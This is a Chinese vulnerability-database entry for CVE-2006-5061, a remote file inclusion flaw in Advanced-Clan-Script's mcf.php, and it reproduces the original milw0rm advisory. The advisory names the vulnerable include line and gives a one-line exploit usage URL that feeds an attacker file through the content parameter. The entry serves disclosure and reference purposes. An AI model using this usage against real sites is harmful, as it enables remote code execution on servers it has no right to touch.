Advanced-Clan-Script 'mcf.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111117 漏洞类型 输入验证
发布时间 2006-09-24 更新时间 2006-10-20
CVE编号 CVE-2006-5061 CNNVD-ID CNNVD-200609-467
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2422
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-467
|漏洞详情
Advanced-Clan-Script(AVCX)3.4及更早版本的mcf.php中存在PHP远程文件包含漏洞,远程攻击者可以通过content参数中的URL执行任意PHP代码。
|漏洞EXP
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*              .___.__     
*   ___  ___ __| _/|  |__  
*   \  \/  // __ | |  |  \
*    >    </ /_/ | |   Y  \
*   /__/\_ \____ | |___|  /
*         \/    \/      \/  discovered by xdh
*
*
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*    {Critical Level}: Dangerous   
*    {Class}: Remote File Inclusion                                           
*    {Venedor site}: http://avc.x.philipwette.de/     
*    {Version}: AdVancedClanscript < 3.4       
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*
* VUln:
* Filename: mcf.php
* Line: 70:include("$content");
*        
*    usage: http://www.test.com/path/mcf.php?content=xpl
*
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*    greetz ² morgan, nethug-47, r00t, tz4r, x2k,
*         jack, id and many others  
*          /server -m irc.root.net.ve -j #morgan
*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# milw0rm.com [2006-09-24]
|参考资料

来源:XF
名称:advancedclanscript-mcf-file-include(29127)
链接:http://xforce.iss.net/xforce/xfdb/29127
来源:BID
名称:20167
链接:http://www.securityfocus.com/bid/20167
来源:MILW0RM
名称:2422
链接:http://www.milw0rm.com/exploits/2422
来源:VUPEN
名称:ADV-2006-3765
链接:http://www.frsirt.com/english/advisories/2006/3765
来源:SECUNIA
名称:22070
链接:http://secunia.com/advisories/22070
来源:OSVDB
名称:29123
链接:http://www.osvdb.org/29123
来源:MILW0RM
名称:2422
链接:http://milw0rm.com/exploits/2422